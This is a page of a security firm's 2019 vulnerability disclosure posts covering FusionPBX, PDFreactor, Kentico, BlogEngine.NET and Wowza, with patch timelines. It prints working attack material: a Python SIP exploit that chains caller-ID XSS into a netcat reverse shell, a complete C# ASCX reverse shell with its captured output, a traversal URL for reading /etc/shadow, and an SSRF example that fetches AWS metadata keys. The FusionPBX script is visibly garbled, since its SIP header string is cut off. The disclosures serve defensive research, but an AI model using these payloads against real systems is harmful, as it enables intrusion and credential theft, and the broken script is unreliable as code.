Search
RSS Feed
Twitter
Friday
Jun072019

RCE Using Caller ID - Multiple Vulnerabilities in FusionPBX

Aon’s Cyber Solutions has recently discovered several vulnerabilities in FusionPBX, an open-source VoIP PBX application that runs on top of the FreeSWITCH VoIP switch.  These vulnerabilities allow for novel exploitation vectors, including an exploit chain that is triggered by a phone call with a malicious caller ID value that leads to remote code execution.  This post provides an overview of a selection of the discovered vulnerabilities, and details of the caller ID RCE exploit chain that combines CVE-2019-11408 and CVE-2019-11409.  Future posts will cover additional FusionPBX vulnerabilities and their exploitation, including one triggered by sending a malicious fax.  All vulnerabilities described in this post have been patched.

Timeline:

04/04/19 - Vulnerabilities disclosed to FusionPBX
04/05/19 - Developer pushes preliminary patches to the project’s Github
04/07/19 - Attempt to contact developer to discuss coordinated disclosure
04/09/19 - Developer responds and states that they do not intend to publish advisory or otherwise disclose the existence of the vulnerabilities
04/22/19 - CVE IDs obtained and shared with developer, 2nd request for coordination of public disclosure, no response received
05/22/19 - Aon provides updated patch for CVE-2019-11409 in a pull request
06/02/19 - Pull request accepted
06/06/19 - Aon public disclosure

Vulnerability Listing / Credits:

CVE-2019-11408: Dustin Cobb - XSS in Operator Panel
CVE-2019-11409: Dustin Cobb - Command Injection in Operator Panel
CVE-2019-11410: Dustin Cobb - Command Injection in Backup Module
CVE-2019-11407: Dustin Cobb - Information disclosure through debug parameter

Details:

CVE-2019-11408 - XSS in Operator Panel

The operator panel module in FusionPBX suffers from a serious XSS vulnerability in the index_inc.php file.  The caller id number string isn’t properly output encoded before being rendered.  The output of this file is used by the index.php file, which refreshes every 1500ms by making an ajax call to the index_inc.php file.  The screen is designed to be used by a call center operator who wishes to monitor call activity on all of the extensions in the system.  Because this screen is designed to be constantly monitored by the operator, this becomes a more serious issue than an XSS vulnerability on an infrequently visited page.  An attacker may inject an XSS payload into the caller id number field of an inbound call, which can originate from the PSTN.  This vulnerability can be chained with CVE-2019-11409, resulting in remote code execution by an unauthenticated attacker.  This is demonstrated by the exploit code provided below.

In summary, an attacker may initiate a call from outside of the network with a specially crafted caller id number and, should the operator have this screen up at that time, gain remote code execution resulting in full system compromise.

The vulnerable code is shown below.  On line 47 in the index_inc.php file, get_call_activity() is called:

46 //get the call activity
47         $activity = get_call_activity();

On line 40 and 41 of the get_call_activity() function, we can see that the call activity values are being retrieved from FreeSWITCH via an event socket API call. On line 114, the caller id number value is being extracted from that JSON response.  Note that, at no point, has the code performed any sanitization or html encoding operations.
app/operator_panel/resources/functions/get_call_activity.php:

37         //send the command
38                 $fp = event_socket_create($_SESSION['event_socket_ip_address'], $_SESSION['event_socket_port'], $_SESSION['event_s    ocket_password']);
39                 if ($fp) {
40                         $switch_cmd = 'show channels as json';
41                         $switch_result = event_socket_request($fp, 'api '.$switch_cmd);
42                         $json_array = json_decode($switch_result, true);
43                 }
[…]
112                                         $array[$x]["state"] = $field['state'];
113                                         $array[$x]["cid_name"] = $field['cid_name'];
114                                         $array[$x]["cid_num"] = $field['cid_num'];

Once the get_call_activity() function returns with the unsanitized caller id number value, we can see that this is extracted to the $call_number, which is then directly concatenated into the HTML on line 369:
app/operator_panel/index_inc.php:

215                 $dir_icon = 'inbound';
216                 $call_name = $activity[$ext['cid_num']]['effective_caller_id_name'];
217                 $call_number = format_phone($ext['cid_num']);
[…]
368                 $block .= "                     </td></tr></table>";
369                 $block .= "                     <span id='op_caller_details_".$extension."'><strong>".$call_name."</strong><br>".$call_number."</span>";
370                 $block .= "             </span>";

CVE-2019-11409 - Command Injection in Operator Panel

The exec.php component of the operator panel module suffers from an API command injection vulnerability.  This code is meant to send certain commands to the FreeSWITCH event socket interface, like disconnect calls or initiate call recording.  However, the command actually being sent to the event socket interface is entirely controlled by the “cmd” parameter.  Although authentication is required for exploitation, administrative privileges are not.  No CSRF protection is in place, making it possible to target authenticated users with HTML payloads that can silently exploit the issue.  It can also be chained with the XSS in CVE-2019-11408 to achieve unauthenticated remote code execution.  To exploit this issue, an authenticated user with access to the operator panel interface simply needs to make a request such as this:

https://victim-pbx1.example.com/app/operator_panel/exec.php?cmd=system%20nc%20-e%20/bin/bash%10.10.10.10%204444

The vulnerable code is shown below. On line 51, we can see that the $switch_cmd variable is being initialized with the value from a GET parameter.  While an attempt is being made to sanitize the value for normal command injection characters, none are needed in this case.  We simply issue a command directly.
/app/operator_panel/exec.php

50         if (count($_GET)>0) {
51                 $switch_cmd = trim(check_str($_GET["cmd"]));
52                 $action = trim(check_str($_GET["action"])); 

On line 162, we see that the command is being sent directly to the event socket interface:

162                 $switch_result = event_socket_request($fp, 'api '.$switch_cmd);

When sending the FreeSWITCH “system” command, any shell command can be executed within the context of the FreeSWITCH user.

Exploit Code (chains -11408 and -11409):

#!/usr/bin/python
import socket, sys
from random import randint
from hashlib import md5

# Exploitation steps:
#
# 1. First, encode an XSS payload that will be injected into the “Caller ID Number” field, or “User” component of the SIP “From” URI.
# 2. Connect to external SIP profile port and send a SIP INVITE packet with XSS payload injected into the From Field.
# 3. XSS payload will fire operator panel screen, which is designed to be monitored constantly by a call center operator.
# 4. Once XSS code executes, a call is made to the exec.php script with a reverse shell payload that connects back to a netcat listener on the attacker system.  Refer to vulnerability #2 in this document for details.


# edit these variables to set up attack
victim_addr="10.10.10.10"
victim_host="victim-pbx1.example.com"
victim_num="12125551212"

attacker_ip="10.10.10.20"
attacker_port=4444

def encode(val):
    ret=""

    for c in val:
        ret+="\\x%02x" % ord(c)

    return ret

callid=md5(str(randint(0,99999999))).hexdigest()

cmd="nc -e /bin/bash %s %d" % (attacker_ip, attacker_port)
payload="q=new XMLHttpRequest();q.open('GET','exec.php?cmd=system %s',true);q.send();" % cmd

xss=";tag=%s
To: 
Call-ID: %s
CSeq: 1 INVITE
Contact: 
Max-Forwards: 70
User-Agent: Exploit POC
Content-Type: application/sdp
Allow: INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE, MESSAGE
Content-Length: 209

v=0
o=root 1204310316 1204310316 IN IP4 127.0.0.1
s=Media Gateway
c=IN IP4 127.0.0.1
t=0 0
m=audio 4446 RTP/AVP 0 101
a=rtpmap:0 PCMU/8000
a=rtpmap:101 telephone-event/8000
a=fmtp:101 0-16
a=ptime:2
a=sendrecv""" % (victim_num, victim_host, xss, callid, victim_num, victim_host, callid)

payload=payload.replace("\n","\r\n")

s=socket.socket()

s.connect((victim_addr,5080))

print payload
print

s.send(payload)
data=s.recv(8192)

print data

Reproduction Steps:

1.    View the vulnerable operator screen in a web browser, located in this example at https://10.10.10.10/app/operator_panel/index.php
2.    Start a netcat listener on a remote system, 10.10.10.20 in this example
3.    Run the exploit code above on the remote system in another terminal window
4.    The exploit will connect to the netcat listener and provide a reverse shell

CVE-2019-11410 - Command Injection in Backup Module

The restore function in the backup module of FusionPBX suffers from a command injection vulnerability. An authenticated user with admin privileges may upload a file with a specially crafted filename which will result in remote code execution via shell command injection.

CVE-2019-11407 - Information disclosure through debug parameter

The operator panel module suffers from an information disclosure vulnerability that reveals sensitive information, such as the password for the FreeSWITCH event socket interface. This is due to a debug parameter which dumps the contents of several arrays, most notably the $_SESSION array.

Tuesday
May282019

SSRF and XXE Vulnerabilities in PDFreactor

Aon’s Cyber Solutions recently discovered two vulnerabilities in RealObjects PDFreactior prior to version 10.1.10722 in the default configuration.  The identified vulnerabilities allow attackers to perform Server-Side Request Forgery (SSRF) and XML External Entity Injection (XXE) attacks in cases where PDFreactor is used to process user-controllable HTML over a network. Exploitation of these vulnerabilities allows for an attacker to access local system files as well as internal network resources in order to retrieve secrets or bypass firewall rules.  These vulnerabilities were discovered by Sean Melia.

Aon’s Cyber Solutions would like to thank RealObjects for working with us as part of our coordinated disclosure process to quickly remediate these vulnerabilities.

Timeline:

04/08/19 - Initial disclosure
04/09/19 - Receipt acknowledged
04/18/19 - Issues confirmed, documentation updates & fixes slated for 10.1
04/18/19 - SSRF issue discovered by a 3rd party and published as a 0 day on Twitter
04/24/19 - RealObjects publishes preliminary advisory with suggested workarounds
05/27/19 - Version 10.1.10722 released

Vendor Advisories:

https://www.pdfreactor.com/pdfreactor-10-maintenance-release-10-1-10722-now-available/
https://www.pdfreactor.com/important-pdfreactor-security-advisory/

CVE-2019-12153 Server-Side Request Forgery (SSRF)

Overview:

The PDFreactor library prior to version 10.1.10722 is vulnerable to Server-Side Request Forgery (SSRF) attacks, where user input defining a URL (e.g. protocol and hostname information) is accepted and used to build a request to an arbitrary host. An example of exploitation would be to access internal network resources such as “http://169.254.169.254/latest/meta-data/” and retrieve the AWS secret keys. Additionally, local system files can be extracted this way using the “file:/” or “netdoc://” handlers.

Remediation:

PDFreactor version 10.1.10722 will no longer load resources from the local filesystem by default.  Documentation and sample code have been updated to clarify the risks of allowing external references and demonstrate how they may be safely allowed.

CVE-2019-12154 XML External Entity (XXE)

Overview:

The PDFreactor library prior to version 10.1.10722 is vulnerable to XML External Entity (XXE) attacks. User input defining an external resource, such as an XML document or SVG image, that contains a malicious payload is parsed by the backend Java XML Parser. When the malicious XML payload is parsed, local system files or internal hosts can be interacted with via common handlers such as “file:/”, “netdoc://”, or “http://”. This exposure is due to the way in which the parser handles XML documents containing external entities. When an XML parser encounters a DOCTYPE declaring an external entity, it expands all instances of the entity with the contents of the URI reference defined.

Remediation:

PDFreactor version 10.1.10722 disables External XML Entity processing by default.  If a user wishes to enable it, the URLStreamHandler class has been updated to process External XML Entity resolution to allow for custom validation to be performed.

Monday
Apr152019

Unauthenticated Remote Code Execution in Kentico CMS

Aon’s Cyber Solutions Security Testing team recently discovered a vulnerability, CVE-2019-10068, in the Kentico CMS platform versions 12.0.14 and earlier. This issue allows for unauthenticated remote code execution through a deserialization vulnerability in the staging service. A fix is available in the current version, 12.0.15.  This vulnerability was discovered by Manoj Cherukuri and Justin LeMay.  Exploit code is currently being withheld.

Aon’s Cyber Solutions would like to thank Kentico for working with us as part of our coordinated disclosure process to quickly remediate this vulnerability.

Timeline:

03/13/2019 - Issue disclosed to Kentico
03/14/2019 - Receipt acknowledged
03/20/2019 - Vulnerability confirmed by Kentico
03/22/2019 - Patch released in version 12.0.15
04/15/2019 - Public disclosure

Vendor Advisory/Patch:

https://devnet.kentico.com/download/hotfixes#securityBugs-v12

Details:

The Kentico CMS application is vulnerable to a .NET object deserialization vulnerability that allows attackers to perform remote code execution and obtain unauthorized remote access. An XML encoded SOAP message within an element of the actual SOAP body was being deserialized by a SOAP Action within the staging web service. The staging service is used by the application to synchronize changes between different environments or servers. 

The identified vulnerable web service is installed by default and can be exploited under the default configuration. Although the deserialization of the payload sent for synchronization is expected to happen post-authentication and only when the staging service is enabled (disabled by default), the application allows deserialization of the payload even if both these conditions are not satisfied when parsing a specially-crafted request. The only requirement for exploitation of this issue is that the staging service must use username-based authentication, which is the default configuration.

Thursday
Mar282019

Remote Code Execution in BlogEngine.NET

Aon’s Cyber Solutions Security Testing team recently discovered a vulnerability, CVE-2019-6714, in the BlogEngine.NET blogging software platform affecting versions 3.3.6.0 and earlier. This issue allows for remote code execution through a path traversal vulnerability in the file upload feature available to blog post editors. A fix is available in the current version, 3.3.7.0.

Aon’s Cyber Solutions would like to thank the BlogEngine.NET developers for working with us as part of our coordinated disclosure process to quickly remediate this vulnerability.

Timeline:

01/21/2019 - Issue discovered, exploit developed and tested
02/05/2019 - Contact established with developer, details of vulnerability sent
02/07/2019 - Developer pushed fixes to Github
02/07/2019 - Fixes for issue were tested and confirmed to be fixed
02/09/2019 - Official 3.3.7.0 release was done on Github
03/28/2019 - Public disclosure

Patch:

https://github.com/rxtur/BlogEngine.NET/commit/612164e60f1c47d74e8bdcdf334f8e991d16873b

Details:

The test environment used during the discovery of this vulnerability was a fully patched and updated Windows 2016 server (build 14393) running IIS 10. The version of BlogEngine.NET that was tested can be found here on Github:

https://github.com/rxtur/BlogEngine.NET/releases/tag/v3.3.6.0

While this does describe the specific test environment, this exploit was found to work with slight modifications on versions of BlogEngine.NET as far back as 1.5.0.7 running on Windows 2008 R2.

When adding or editing a blog post, BlogEngine.NET allows for the upload of arbitrary files which are meant to be included as part of the post. By default, these files are stored in the /App_Data/files folder of the document root belonging to the BlogEngine.NET instance. If an attacker uploads a file called PostView.ascx containing malicious C# code, they can then cause that malicious code to be executed by exploiting a directory traversal vulnerability in the /Custom/Controls/PostList.ascx.cs file. The vulnerable code can be seen here:

125                var path = string.Format("{0}Custom/Themes/{1}/PostView.ascx", Utils.ApplicationRelativeWebRoot, BlogSettings.Instance.GetThemeWithAdjustments(this.Request.QueryString["theme"]));
126                var counter = 0;
127    
128                if(!System.IO.File.Exists(Server.MapPath(path)))
129                    path = string.Format("{0}Custom/Controls/Defaults/PostView.ascx", Utils.ApplicationRelativeWebRoot);
130    
131                foreach (Post post in visiblePosts.GetRange(index, stop))
132                {
133                    if (counter == stop)
134                    {
135                        break;
136                    }
137    
138                    var postView = (PostViewBase)this.LoadControl(path);
139                postView.ShowExcerpt = ShowExcerpt();

As you can see on line 125 above, this code will get a “theme” value from the query string. This is meant to execute code that renders pages differently according to a user’s needs or desires. For example, a mobile theme might be appropriate for viewing pages on a mobile device rather than a desktop. Unfortunately, this value is not being sanitized for any directory traversal sequences (i.e., “../”).

Note that also on line 125, we see this:

 string.Format("{0}Custom/Themes/{1}/PostView.ascx"

This means that the code will look for and, if it exists, execute a file called PostView.ascx in the specified theme directory. In this attack scenario, that directory would be the /App_Data/files directory, where we previously uploaded the malicious file with the name of PostView.ascx.

Reproduction Steps

To reproduce this exploit, first modify the exploit code shown in the following section to match the IP address and port of a netcat listener that will be waiting for a reverse shell connection. Next, perform the following actions:

  1. Log into the BlogEngine.NET instance with a user who has rights to add or edit a blog post.
  2. Navigate to the Content menu.
  3. A listing of posts should be shown on this screen. Click New to add one.
  4. In the toolbar located above the post body, there should be a number of icons. There should be one that looks like an open file, called File Manager. Click this icon.
  5. Here, simply upload the previously edited PostView.ascx file.
  6. Make sure you have a netcat listener waiting for a connection at the previously specified IP and port.
  7. Browse to the following URL: http://example.com/?theme=../../App_Data/files

You should now receive a connection from the server and have a command shell running in the context of the BlogEngine.NET web application.

Exploit Code:
/*
 * CVE-2019-6714
 *
 * Path traversal vulnerability leading to remote code execution.  This 
 * vulnerability affects BlogEngine.NET versions 3.3.6 and below.  This 
 * is caused by an unchecked "theme" parameter that is used to override
 * the default theme for rendering blog pages.  The vulnerable code can 
 * be seen in this file:
 * 
 * /Custom/Controls/PostList.ascx.cs
 *
 * Attack:
 *
 * First, we set the TcpClient address and port within the method below to 
 * our attack host, who has a reverse tcp listener waiting for a connection.
 * Next, we upload this file through the file manager.  In the current (3.3.6)
 * version of BlogEngine, this is done by editing a post and clicking on the 
 * icon that looks like an open file in the toolbar.  Note that this file must
 * be uploaded as PostView.ascx. Once uploaded, the file will be in the
 * /App_Data/files directory off of the document root. The admin page that
 * allows upload is:
 *
 * http://10.10.10.10/admin/app/editor/editpost.cshtml
 *
 *
 * Finally, the vulnerability is triggered by accessing the base URL for the 
 * blog with a theme override specified like so:
 *
 * http://10.10.10.10/?theme=../../App_Data/files
 *
 */

<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>

<script runat="server">
    static System.IO.StreamWriter streamWriter;

    protected override void OnLoad(EventArgs e) {
        base.OnLoad(e);

    using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.10.10.20", 4445)) {
        using(System.IO.Stream stream = client.GetStream()) {
            using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
                streamWriter = new System.IO.StreamWriter(stream);
                        
                StringBuilder strInput = new StringBuilder();

                System.Diagnostics.Process p = new System.Diagnostics.Process();
                p.StartInfo.FileName = "cmd.exe";
                p.StartInfo.CreateNoWindow = true;
                p.StartInfo.UseShellExecute = false;
                p.StartInfo.RedirectStandardOutput = true;
                p.StartInfo.RedirectStandardInput = true;
                p.StartInfo.RedirectStandardError = true;
                p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
                p.Start();
                p.BeginOutputReadLine();

                while(true) {
                    strInput.Append(rdr.ReadLine());
                    p.StandardInput.WriteLine(strInput);
                    strInput.Remove(0, strInput.Length);
                }
            }
        }
        }
    }

    private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
       StringBuilder strOutput = new StringBuilder();

           if (!String.IsNullOrEmpty(outLine.Data)) {
               try {
                    strOutput.Append(outLine.Data);
                        streamWriter.WriteLine(strOutput);
                        streamWriter.Flush();
                } catch (Exception err) { }
        }
    }

</script>
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>

Exploit Output:

$ nc -nvlp 4445
Listening on [0.0.0.0] (family 2, port 4445)
Connection from 192.168.70.217 49848 received!
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
whoami
c:\windows\system32\inetsrv>whoami
iis apppool\defaultapppool

c:\windows\system32\inetsrv>
Monday
Feb112019

Wowza Streaming Engine Manager Directory Traversal and Local File Inclusion

Aon’s Cyber Solutions Security Testing Team (formerly GDS) recently discovered a security vulnerability affecting the Wowza Streaming Engine Manager software version 4.7.4.01, CVE-2018-19365.  The issue allows for local file inclusion with root privileges. Exploitation of this vulnerability requires authentication with an Administrator account, however a default administrator account with known or easily guessed passwords is commonly used.

ACS thanks Wowza for working together as part of the ACS coordinated disclosure process to identify, patch, and disclose this issue.  Patches are currently available in version 4.7.5.02 and later.

Wowza Advisory:

https://github.com/WowzaMediaSystems/public_cve/blob/master/wowza-streaming-engine/CVE-2018-19365.txt

Details:

The Wowza Streaming Engine Manager application allows for unauthorized access to the local file system of the server via the ‘/enginemanager/server/logs/download’ endpoint on the “logName” parameter. This allows for local files such as ‘/etc/passwd’ or ‘/etc/shadow’’ to be extracted by attackers in the form of a zip file.

Exploit URL:

https://<host>/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/shadow&logSource=engine

Response:

HTTP/1.1 200 OK
Server: Winstone Servlet Engine v1.0.5
Content-Type: application/octet-stream Content-Disposition: attachement; filename=”shadow.zip”
Connection: Close

[ZIP FILE CONTENTS]

The contents of /etc/shadow are included in the downloaded shadow.zip file.